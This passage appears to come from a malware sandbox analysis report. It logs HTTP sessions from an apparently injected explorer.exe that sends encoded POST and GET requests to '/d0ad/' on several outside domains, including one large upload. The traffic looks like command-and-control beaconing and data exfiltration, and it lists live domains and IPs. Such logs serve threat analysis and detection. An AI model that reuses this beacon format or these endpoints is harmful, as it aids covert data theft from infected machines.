Oct 26, 2022 13:17:08.177037001 CEST	841	IN	Data Raw: 6f 72 2d 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 23 39 62 35 31 65 30 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a Data Ascii: or--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset5A8--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rg
Oct 26, 2022 13:17:08.177118063 CEST	841	IN	Data Raw: 2c 32 34 35 2c 32 30 33 29 20 30 25 2c 72 67 62 28 31 38 32 2c 32 32 37 2c 32 31 32 29 20 35 30 25 2c 72 67 62 28 35 31 2c 31 36 37 2c 31 38 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 65 6c Data Ascii: ,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,1
Oct 26, 2022 13:17:08.177207947 CEST	843	IN	Data Raw: 35 39 36 0d 0a 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 64 75 6f 74 6f 6e 65 2d 2d 67 72 61 79 73 63 61 6c 65 3a 20 75 72 6c 28 27 23 77 70 2d 64 75 6f 74 6f 6e 65 2d 67 72 61 79 73 63 61 6c 65 27 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d Data Ascii: 596--wp--preset--duotone--grayscale: url('#wp-duotone-grayscale');--wp--preset--duotone--purple-yellow: url('#wp-duotone-purple-yellow');--wp--preset--duotone--blue-red: url('#wp-duotone-blue-red');--wp--preset--duotone--midnight: url('#wp-d
Oct 26, 2022 13:17:08.177258968 CEST	843	IN	Data Raw: 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 67 72 65 65 6e 2d 63 79 61 6e 29 20 21 69 Data Ascii: ;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color-
Oct 26, 2022 13:17:08.197419882 CEST	844	IN	Data Raw: 31 36 39 41 0d 0a 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 Data Ascii: 169A-pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
29	192.168.11.20	49873	51.91.236.193	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:09.742439032 CEST	881	OUT	GET /d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4jv2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0 HTTP/1.1 Host: www.rahaingoadvice.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Oct 26, 2022 13:17:10.167467117 CEST	882	IN	HTTP/1.1 301 Moved Permanently date: Wed, 26 Oct 2022 11:17:10 GMT content-type: text/html; charset=UTF-8 transfer-encoding: chunked server: Apache x-powered-by: PHP/8.0 set-cookie: uncode_privacy[consent_types]=%5B%5D; expires=Thu, 26-Oct-2023 11:17:10 GMT; Max-Age=31536000; path=/; SameSite=Strict expires: Wed, 11 Jan 1984 05:00:00 GMT cache-control: no-cache, must-revalidate, max-age=0 x-redirect-by: WordPress location: http://rahaingoadvice.com/d0ad/?jXu=m7uzBk1mijYTNPshBFAqU72ljYeWgHJ5zfNDKvzfwbEYFcgOzP3ENcHYjhFO4j Data Raw: Data Ascii:
Oct 26, 2022 13:17:10.167542934 CEST	882	IN	Data Raw: 32 64 75 37 71 55 4f 4b 45 5a 32 30 2b 42 6f 6a 30 4e 76 4c 67 73 7a 52 56 37 73 30 54 73 66 55 64 34 67 3d 3d 26 2d 5a 65 44 78 48 3d 31 62 66 44 78 68 65 58 4c 54 57 74 78 42 30 0d 0a 78 2d 69 70 6c 62 2d 72 65 71 75 65 73 74 2d 69 64 3a 20 36 Data Ascii: 2du7qUOKEZ20+Boj0NvLgszRV7s0TsfUd4g==&-ZeDxH=1bfDxheXLTWtxB0x-iplb-request-id: 66818F25:C2D1_335BECC1:0050_63591735_19716:2EB7Ax-iplb-instance: 32678connection: close0

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.11.20	49847	2.57.90.16	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:15:40.409604073 CEST	332	OUT	POST /d0ad/ HTTP/1.1 Host: www.mnrinstitutes.com Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.mnrinstitutes.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.mnrinstitutes.com/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 75 68 68 39 36 75 64 7a 67 69 68 70 36 53 78 70 63 54 41 54 52 72 4b 69 57 67 36 30 55 51 54 33 51 79 57 6b 4b 45 68 38 52 70 6e 38 4a 65 74 6b 65 4a 58 43 31 4c 77 2d 42 72 49 44 70 77 53 56 38 34 43 6c 75 64 31 4e 78 32 46 78 74 4a 58 6e 49 62 37 31 76 6a 69 66 38 6c 36 6a 77 66 35 30 63 53 43 50 4f 7a 34 4f 67 55 31 54 41 31 48 50 51 62 4e 4e 4b 48 41 51 42 4c 5a 41 78 7a 30 64 6e 53 78 47 79 74 6a 6e 51 6a 73 65 47 38 55 73 46 52 38 51 54 6c 38 76 48 36 7e 52 54 4d 54 54 77 38 65 37 59 76 76 46 32 31 75 52 6b 64 74 32 74 65 52 48 28 74 51 52 28 55 31 67 6e 6c 36 57 39 6f 4e 4e 51 36 6a 38 53 5f 46 66 69 62 79 6e 33 43 48 4b 5a 77 67 63 69 59 38 67 43 62 4a 44 52 66 50 76 71 4a 69 32 5a 50 30 6e 4e 5f 7a 58 79 68 44 57 6d 38 33 57 56 35 59 58 48 6d 6f 41 51 6b 38 61 35 72 44 2d 37 41 52 5f 43 2d 28 66 4a 43 42 49 37 66 31 4a 74 74 35 5f 65 7a 55 67 49 63 67 30 33 6e 42 73 73 31 6f 30 43 45 43 7a 68 66 4a 35 77 5a 48 64 38 34 7e 57 6f 75 78 6d 64 52 63 48 43 57 68 71 48 36 55 4f 66 77 74 51 49 52 63 6f 59 79 53 36 56 47 6f 67 36 67 7a 34 59 34 53 76 59 39 6f 72 6b 45 73 6a 55 6d 59 57 61 45 7a 4e 42 37 47 6b 59 4b 65 42 28 71 70 32 75 62 44 69 77 59 7e 37 55 69 30 45 46 76 58 6b 68 51 68 36 53 42 56 2d 4c 42 48 67 77 6b 45 33 73 70 59 44 68 6f 47 47 70 54 64 42 46 31 5a 62 57 69 36 51 5a 75 7a 79 33 5a 36 63 73 6e 63 78 75 72 39 58 42 39 4d 53 69 51 66 5a 28 4f 58 63 4a 33 66 5f 61 53 75 39 28 6b 43 4e 75 7a 54 68 6d 31 6c 65 79 4d 35 39 55 43 43 39 7a 76 4c 53 41 55 70 34 6c 70 49 68 70 42 64 65 48 50 71 77 79 52 6e 54 51 54 67 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=uhh96udzgihp6SxpcTATRrKiWg60UQT3QyWkKEh8Rpn8JetkeJXC1Lw-BrIDpwSV84Clud1Nx2FxtJXnIb71vjif8l6jwf50cSCPOz4OgU1TA1HPQbNNKHAQBLZAxz0dnSxGytjnQjseG8UsFR8QTl8vH6~RTMTTw8e7YvvF21uRkdt2teRH(tQR(U1gnl6W9oNNQ6j8S_Ffibyn3CHKZwgciY8gCbJDRfPvqJi2ZP0nN_zXyhDWm83WV5YXHmoAQk8a5rD-7AR_C-(fJCBI7f1Jtt5_ezUgIcg03nBss1o0CECzhfJ5wZHd84~WouxmdRcHCWhqH6UOfwtQIRcoYyS6VGog6gz4Y4SvY9orkEsjUmYWaEzNB7GkYKeB(qp2ubDiwY~7Ui0EFvXkhQh6SBV-LBHgwkE3spYDhoGGpTdBF1ZbWi6QZuzy3Z6csncxur9XB9MSiQfZ(OXcJ3f_aSu9(kCNuzThm1leyM59UCC9zvLSAUp4lpIhpBdeHPqwyRnTQTg.
Oct 26, 2022 13:15:40.435426950 CEST	332	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 26 Oct 2022 11:15:40 GMT Content-Type: text/html Content-Length: 146 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
30	192.168.11.20	49874	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:15.216478109 CEST	883	OUT	POST /d0ad/ HTTP/1.1 Host: www.altruista.one Connection: close Content-Length: 185 Cache-Control: no-cache Origin: http://www.altruista.one User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.altruista.one/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 68 6f 68 53 5a 2d 67 4c 48 52 6f 2d 45 6c 64 4c 76 55 77 38 31 77 37 53 6c 35 36 55 79 74 4c 69 42 71 28 6c 57 70 77 70 31 5f 46 6e 6b 75 54 78 7a 51 44 74 31 4d 31 53 30 62 6d 35 78 38 31 4c 44 52 7a 43 4f 34 61 47 37 57 57 76 47 36 52 5a 50 4b 41 5f 6f 31 53 4d 4a 39 68 50 62 39 42 71 4a 71 55 45 55 7a 76 75 49 33 4f 30 42 59 44 6a 36 58 63 4f 42 52 4f 76 31 58 55 65 58 73 47 37 31 33 44 72 71 41 41 75 44 52 75 4f 6e 41 44 34 4a 6b 28 30 57 4a 39 41 4a 50 6a 43 67 4e 37 45 41 37 35 63 67 4b 4b 37 48 56 54 62 4f 75 36 56 46 51 29 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=hohSZ-gLHRo-EldLvUw81w7Sl56UytLiBq(lWpwp1_FnkuTxzQDt1M1S0bm5x81LDRzCO4aG7WWvG6RZPKA_o1SMJ9hPb9BqJqUEUzvuI3O0BYDj6XcOBROv1XUeXsG713DrqAAuDRuOnAD4Jk(0WJ9AJPjCgN7EA75cgKK7HVTbOu6VFQ).
Oct 26, 2022 13:17:15.231239080 CEST	884	IN	HTTP/1.1 405 Not Allowed Date: Wed, 26 Oct 2022 11:17:15 GMT Content-Type: text/html Content-Length: 150 Connection: close Server: UD Forwarding 3.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
31	192.168.11.20	49875	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:17.248756886 CEST	885	OUT	POST /d0ad/ HTTP/1.1 Host: www.altruista.one Connection: close Content-Length: 525 Cache-Control: no-cache Origin: http://www.altruista.one User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.altruista.one/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 68 6f 68 53 5a 2d 67 4c 48 52 6f 2d 46 42 68 4c 75 33 59 38 39 77 37 56 35 70 36 55 34 4e 4c 35 42 71 6a 6c 57 6f 45 41 79 4a 39 6e 6c 50 44 78 79 53 6e 74 32 4d 31 53 73 72 6d 32 31 38 31 51 44 52 75 33 4f 39 61 47 37 57 43 76 48 4d 74 5a 59 4b 42 70 6d 56 53 50 65 4e 68 43 66 39 42 67 4a 71 51 2d 55 33 7a 75 4a 47 69 30 47 64 76 6a 77 6a 6f 4e 46 78 50 6b 38 33 55 5a 46 73 47 39 31 33 47 57 71 43 51 45 41 69 79 4f 6d 67 6a 34 49 6b 28 37 4e 70 39 48 4c 50 69 54 78 59 53 53 4d 4c 42 56 30 36 75 6d 42 56 53 79 59 4b 37 6b 57 51 45 4d 71 71 67 4d 63 6a 35 50 31 6b 35 6a 6a 79 41 45 38 4e 33 56 74 55 57 68 4f 4b 75 65 6f 68 39 70 4e 78 45 66 72 30 34 2d 6d 6d 67 4d 42 75 4b 51 7a 70 30 42 50 72 73 6e 58 55 4e 6f 64 59 37 4d 70 75 65 6f 4b 47 32 49 72 57 71 49 75 2d 72 32 32 43 43 5f 6d 58 57 30 36 66 31 48 45 6b 76 6a 67 53 54 6b 4b 6b 45 69 4d 49 33 6b 54 30 38 51 6d 54 4d 43 74 44 76 6f 51 32 56 34 63 39 7e 54 32 39 6b 64 43 34 72 72 55 34 50 4b 73 6b 67 52 41 77 51 47 4c 62 74 55 42 37 4b 57 4b 46 34 63 45 74 77 63 75 77 70 4e 55 66 4d 34 71 56 71 6e 61 6b 50 71 56 38 59 71 41 6e 64 33 56 6c 65 42 4d 72 4f 6f 4b 48 58 79 37 31 61 61 41 77 6d 6d 54 6b 45 58 43 31 4d 6d 36 65 46 51 71 44 6d 4e 76 45 4d 67 63 69 34 42 51 6e 34 54 7a 4b 61 2d 50 56 78 4d 42 73 46 6e 49 4f 39 76 39 58 56 2d 79 43 43 6d 66 34 63 66 65 39 47 72 4d 4d 44 74 51 47 28 66 7a 4b 79 6f 57 61 32 44 50 77 68 54 58 53 4a 49 30 77 44 4d 58 7a 61 6e 63 55 4f 38 56 50 64 70 33 37 48 4c 4f 76 65 75 30 4e 4e 79 6b 32 4d 65 28 38 4a 50 42 67 66 4d 66 74 4a 32 62 44 41 2e 00 00 00 00 00 00 00 00 Data Ascii: jXu=hohSZ-gLHRo-FBhLu3Y89w7V5p6U4NL5BqjlWoEAyJ9nlPDxySnt2M1Ssrm2181QDRu3O9aG7WCvHMtZYKBpmVSPeNhCf9BgJqQ-U3zuJGi0GdvjwjoNFxPk83UZFsG913GWqCQEAiyOmgj4Ik(7Np9HLPiTxYSSMLBV06umBVSyYK7kWQEMqqgMcj5P1k5jjyAE8N3VtUWhOKueoh9pNxEfr04-mmgMBuKQzp0BPrsnXUNodY7MpueoKG2IrWqIu-r22CC_mXW06f1HEkvjgSTkKkEiMI3kT08QmTMCtDvoQ2V4c9~T29kdC4rrU4PKskgRAwQGLbtUB7KWKF4cEtwcuwpNUfM4qVqnakPqV8YqAnd3VleBMrOoKHXy71aaAwmmTkEXC1Mm6eFQqDmNvEMgci4BQn4TzKa-PVxMBsFnIO9v9XV-yCCmf4cfe9GrMMDtQG(fzKyoWa2DPwhTXSJI0wDMXzancUO8VPdp37HLOveu0NNyk2Me(8JPBgfMftJ2bDA.
Oct 26, 2022 13:17:17.262770891 CEST	885	IN	HTTP/1.1 405 Not Allowed Date: Wed, 26 Oct 2022 11:17:17 GMT Content-Type: text/html Content-Length: 150 Connection: close Server: UD Forwarding 3.1 Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
32	192.168.11.20	49876	89.31.143.1	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Oct 26, 2022 13:17:19.280451059 CEST	890	OUT	POST /d0ad/ HTTP/1.1 Host: www.altruista.one Connection: close Content-Length: 51813 Cache-Control: no-cache Origin: http://www.altruista.one User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Content-Type: application/x-www-form-urlencoded Accept: / Referer: http://www.altruista.one/d0ad/ Accept-Language: en-US Accept-Encoding: gzip, deflate Data Raw: 6a 58 75 3d 68 6f 68 53 5a 2d 67 4c 48 52 6f 2d 46 42 68 4c 75 33 59 38 39 77 37 56 35 70 36 55 34 4e 4c 35 42 71 6a 6c 57 6f 45 41 79 4a 31 6e 6c 39 62 78 77 7a 6e 74 33 4d 31 53 79 62 6d 31 31 38 30 41 44 52 32 7a 4f 39 6d 38 37 54 47 76 47 62 68 5a 59 5a 70 70 32 46 53 4f 43 64 68 41 62 39 42 30 4a 71 56 6b 55 32 58 59 49 33 57 30 42 61 4c 6a 36 79 6f 4f 4a 42 4f 76 38 33 55 56 54 73 48 49 31 32 58 64 71 43 63 45 41 67 47 4f 6d 54 62 34 4b 33 6e 37 56 4a 39 45 59 76 6a 64 6f 49 53 6a 4d 4c 55 6b 30 36 75 59 42 55 57 79 59 4e 50 6b 58 54 38 50 6b 71 67 4d 56 44 35 49 78 6b 30 71 6a 79 73 63 38 4f 72 56 74 54 71 68 4f 71 75 65 6a 6c 68 71 4b 52 45 6a 76 30 34 70 77 6d 73 55 42 75 4f 45 7a 72 34 42 50 37 34 6e 52 6a 5a 6f 65 35 37 4d 71 4f 66 4f 41 6d 32 62 69 32 72 4a 75 2d 37 55 32 44 69 4a 6d 58 79 30 31 66 56 48 56 78 62 67 6e 79 54 6d 50 6b 46 34 49 49 72 67 54 30 73 63 6d 54 4e 66 74 43 37 6f 54 43 52 34 64 5f 57 53 79 74 6b 61 4f 59 72 45 61 59 4c 41 73 6b 39 53 41 78 59 6f 4c 59 68 55 41 62 4b 57 50 6d 51 66 4f 64 77 58 6e 51 6f 52 51 66 4d 6a 71 56 6d 64 61 67 58 51 57 4d 38 71 41 58 74 33 52 31 65 4f 4a 4c 4f 73 54 58 58 30 28 31 61 61 41 77 71 79 54 6b 49 58 44 41 49 6d 6f 63 4e 51 76 51 4f 4e 74 45 4d 69 63 69 34 51 51 6e 38 34 7a 4c 4f 41 50 56 42 79 42 75 70 6e 4e 4c 52 76 34 57 56 39 6a 69 44 73 62 34 63 79 47 64 4b 38 4d 4d 66 6c 51 47 50 6c 79 39 4b 6f 58 61 6d 44 59 51 68 53 53 79 4a 53 6b 67 43 55 54 79 6d 46 63 55 53 73 56 50 35 41 33 34 33 4c 4e 4b 6e 53 76 4f 52 49 79 47 45 32 31 37 4e 70 43 6d 4c 6b 4c 59 46 44 49 6c 45 71 69 4f 77 43 65 65 48 77 77 46 69 48 61 34 39 6f 74 4c 45 4e 71 52 79 35 31 74 6a 61 38 4c 6f 72 69 33 59 32 42 58 28 41 41 30 31 6e 54 59 72 57 79 32 42 70 38 35 6b 61 34 37 58 6c 55 5f 52 59 67 74 67 57 51 61 4e 43 46 69 51 4b 50 56 6a 47 52 51 79 50 50 57 6d 36 59 71 37 6a 32 70 76 57 47 77 72 35 57 71 72 4f 45 72 4a 2d 56 43 6a 42 6e 33 41 51 48 77 74 54 79 58 71 76 39 55 72 6e 55 51 6f 73 5a 49 57 4e 66 42 58 34 73 38 47 79 32 65 4d 75 79 71 65 31 31 49 75 39 43 75 39 77 66 36 77 56 70 47 43 75 31 51 71 54 5a 6f 52 51 39 71 78 6c 33 50 7a 54 47 63 49 57 72 4b 68 76 33 45 34 64 78 68 5a 6b 51 66 48 37 7e 66 52 54 74 30 78 33 67 35 31 65 37 59 4c 65 4d 71 4c 34 6b 71 76 65 41 71 69 75 6e 59 49 7a 54 78 48 6e 67 61 48 71 6b 48 32 6c 6a 72 51 4b 65 41 44 67 6e 57 55 50 45 57 76 68 63 57 45 75 57 4b 36 69 64 4e 47 36 53 65 7e 7a 43 76 6a 78 45 52 6d 4e 64 55 48 38 4f 4a 4b 50 32 34 37 6d 4c 31 44 70 48 49 55 43 63 6f 66 4d 42 52 34 4a 51 64 42 7a 49 6f 67 54 67 35 45 38 6e 41 33 32 4b 67 4e 6d 78 47 79 57 71 4b 72 58 53 74 42 4d 51 6a 77 35 31 4e 49 57 28 58 62 38 52 36 54 4b 32 52 28 55 6c 43 72 79 74 69 6b 79 74 67 64 61 69 48 42 4e 65 4b 46 70 6e 55 78 4a 57 42 62 5a 76 32 45 6f 45 51 51 76 47 45 62 67 64 6e 66 31 68 31 66 6b 55 38 70 53 30 4f 38 73 79 4d 53 35 74 33 6d 78 69 44 48 77 53 50 46 6b 4e 74 5a 76 71 53 53 69 49 75 6f 74 77 51 58 42 56 50 58 34 58 57 59 70 4e 4b 28 43 35 2d 74 79 71 49 75 6d 44 68 70 4a 6c 74 52 57 7e 78 78 6b 44 38 64 33 52 6a 6f 47 6c 57 6a 68 30 55 48 33 4a 66 42 76 50 79 4d 44 6e 32 72 74 37 47 34 68 72 61 33 43 33 54 70 6f 46 71 70 36 65 6e 77 4e 61 6a 51 48 61 46 51 79 79 30 46 67 34 71 47 44 38 4f 38 67 58 37 33 46 59 75 6c 39 69 34 38 77 79 43 71 4e 51 51 33 62 75 39 64 77 6f 31 4b 69 4e 43 56 43 77 30 62 49 46 6d 67 5a 35 46 49 6a 45 4f 6f 79 76 47 70 33 4e 55 6f 71 32 45 62 33 72 47 4d 53 39 77 57 53 56 37 52 6d 55 71 35 74 41 4e 5a 5f 31 64 31 72 48 4f 42 33 4f 51 74 66 52 43 77 39 36 65 61 41 46 47 70 50 54 31 59 6e 48 55 34 65 4e 74 54 76 68 51 64 66 31 6f 4e 79 61 37 50 54 77 32 49 77 5a 6e 47 35 72 53 57 66 35 69 65 72 34 30 56 53 38 47 7a 56 74 51 6e 4d 72 4b 65 4b 64 44 50 6b 4e 45 53 45 76 72 56 5a 33 66 6d 68 63 66 66 6e 61 54 42 6f 46 6f 45 55 75 54 35 6e 75 63 72 6f 41 50 72 66 52 31 4b 39 50 72 61 54 51 6e 36 6b 68 64 59 6b 72 78 7e 75 35 35 72 6f 70 38 36 2d 33 41 39 45 48 70 4e 42 50 56 6a 63 67 69 34 46 4b 34 6b 2d 6a 47 37 54 32 5a 30 71 75 6b 70 45 61 61 6f 33 66 55 32 4e 66 7a 4a 34 7a 43 44 4c 33 79 28 4f 64 4c 65 Data Ascii: jXu=hohSZ-gLHRo-FBhLu3Y89w7V5p6U4NL5BqjlWoEAyJ1nl9bxwznt3M1Sybm1180ADR2zO9m87TGvGbhZYZpp2FSOCdhAb9B0JqVkU2XYI3W0BaLj6yoOJBOv83UVTsHI12XdqCcEAgGOmTb4K3n7VJ9EYvjdoISjMLUk06uYBUWyYNPkXT8PkqgMVD5Ixk0qjysc8OrVtTqhOquejlhqKREjv04pwmsUBuOEzr4BP74nRjZoe57MqOfOAm2bi2rJu-7U2DiJmXy01fVHVxbgnyTmPkF4IIrgT0scmTNftC7oTCR4d_WSytkaOYrEaYLAsk9SAxYoLYhUAbKWPmQfOdwXnQoRQfMjqVmdagXQWM8qAXt3R1eOJLOsTXX0(1aaAwqyTkIXDAImocNQvQONtEMici4QQn84zLOAPVByBupnNLRv4WV9jiDsb4cyGdK8MMflQGPly9KoXamDYQhSSyJSkgCUTymFcUSsVP5A343LNKnSvORIyGE217NpCmLkLYFDIlEqiOwCeeHwwFiHa49otLENqRy51tja8Lori3Y2BX(AA01nTYrWy2Bp85ka47XlU_RYgtgWQaNCFiQKPVjGRQyPPWm6Yq7j2pvWGwr5WqrOErJ-VCjBn3AQHwtTyXqv9UrnUQosZIWNfBX4s8Gy2eMuyqe11Iu9Cu9wf6wVpGCu1QqTZoRQ9qxl3PzTGcIWrKhv3E4dxhZkQfH7~fRTt0x3g51e7YLeMqL4kqveAqiunYIzTxHngaHqkH2ljrQKeADgnWUPEWvhcWEuWK6idNG6Se~zCvjxERmNdUH8OJKP247mL1DpHIUCcofMBR4JQdBzIogTg5E8nA32KgNmxGyWqKrXStBMQjw51NIW(Xb8R6TK2R(UlCrytikytgdaiHBNeKFpnUxJWBbZv2EoEQQvGEbgdnf1h1fkU8pS0O8syMS5t3mxiDHwSPFkNtZvqSSiIuotwQXBVPX4XWYpNK(C5-tyqIumDhpJltRW~xxkD8d3RjoGlWjh0UH3JfBvPyMDn2rt7G4hra3C3TpoFqp6enwNajQHaFQyy0Fg4qGD8O8gX73FYul9i48wyCqNQQ3bu9dwo1KiNCVCw0bIFmgZ5FIjEOoyvGp3NUoq2Eb3rGMS9wWSV7RmUq5tANZ_1d1rHOB3OQtfRCw96eaAFGpPT1YnHU4eNtTvhQdf1oNya7PTw2IwZnG5rSWf5ier40VS8GzVtQnMrKeKdDPkNESEvrVZ3fmhcffnaTBoFoEUuT5nucroAPrfR1K9PraTQn6khdYkrx~u55rop86-3A9EHpNBPVjcgi4FK4k-jG7T2Z0qukpEaao3fU2NfzJ4zCDL3y(OdLewK1xik23umNEgsizI6rJjoL68Sq~-q5TLL2bcARGmJTn3n-YEePLgDzjd525_1ztmYQEJFnJ87Lz0TSZwqP(Lks3VB5(FMbH7~uMbwRKl7z4smVnKsr6xZpFVyjXvsLOW4FXW5JW8WZp6z8teq431MD2_sFmzC2mOJcq1KJ3_ZX5M~JB0d4woLQLbdGXymXHDs6eos2KCCGxzDYXf6sGJQrhT99tvsKApZ223pO(9M5r6L11e8hIlsmXlJM~gndB6Jw7H~B1mBJDjFHtcrDP6vrMGH3j-HRO0s3FW2BKGf3d-cl5UjvDCjRtv4a4YWqJ0Ui3H(CjvANbMBZZ8PmxQua47Hu0POnDLl3R0IXBfAgo-LsoEC5WeTMPDpHGm8j9WEdYb0NCsE9kgB9Gf3JjhMGLDb9HSNjPIL17AkU2mBxVoNNRLjgWMYlW0kXwqKERgpjIXh4l_VU95hszZnkVLLTfMVdoYvzMgk_~l8kpcjS~T52qI47zYFjw9aKPhbgGgQd4rebtDMujwrZdMRDz5(7rc8y7-z_ItNBOizK(XYwWEAZxR0oFlFuj6FlGmWSnTnM1TgHCAskcj5wHh9mU22iWnoDE7w6zPDQyox6FRL1fMyLsVMGd_ySnuP2GW9c94m44m9HqddREQohES53yWuZrnHgt_jNzFb2N_ii3qZAfJCcT9lA6TURs_qvqfqBNT8HCSXj39~YJELVHvqmUrS8k0HKO5UbfpyPlnKoUbAa(IDH7BZxWtQpgrHMzIG4cERg6vZxEgdeLDJfiQQ1gZWaYg0AMC0fTgIpAP3x6yjn3PQMA45tebQtFQujqWUZ2bLnuna0s9I5o0EO5SMNuGpb1tN_JLOFGHM1Rc~94WGDmGxoSGnwg5xx6VOwrKr-8z0uvjS9dqS59YGclIYHFi4mJB6shdoTgPXUC8LLDDcx(y4p9gV1d0L5bHR6eaN1mHeSIAXLbEVGN9seRYIYRKTGetqF2jX5RcAmT_JZm1nn67xLAG0aXLKc